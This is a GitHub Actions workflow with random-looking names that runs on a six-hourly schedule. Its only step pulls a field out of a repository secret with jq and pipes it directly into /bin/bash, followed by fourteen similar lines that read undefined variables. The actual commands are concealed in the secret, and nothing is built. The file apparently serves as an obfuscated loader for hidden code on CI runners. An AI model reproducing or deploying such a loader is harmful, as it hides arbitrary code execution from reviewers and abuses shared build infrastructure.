name: yanfusu1932
on:
  workflow_dispatch:
  schedule:
    - cron: '45 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yanfusu1932
        env:
          m5305: ${{ secrets.m5305 }}
        run: |
          echo $m5305 | jq -r .g43 | /bin/bash
          echo $zefuh906 | jq -r .tt08025 | /bin/bash
          echo $khzvx68 | jq -r .zule846 | /bin/bash
          echo $aqls062 | jq -r .nwn0 | /bin/bash
          echo $vjit34865 | jq -r .a50464 | /bin/bash
          echo $xaka3920 | jq -r .hsjd53659 | /bin/bash
          echo $lqszk584 | jq -r .tym1059 | /bin/bash
          echo $nfp905 | jq -r .zq30 | /bin/bash
          echo $w30981 | jq -r .qmje4528 | /bin/bash
          echo $beh61079 | jq -r .ffdwl0 | /bin/bash
          echo $g78583 | jq -r .cndxp4 | /bin/bash
          echo $ku89 | jq -r .fkobf33 | /bin/bash
          echo $vba1 | jq -r .o1680 | /bin/bash
          echo $mf9 | jq -r .opbw573 | /bin/bash
          echo $xuw2921 | jq -r .tzbay67 | /bin/bash

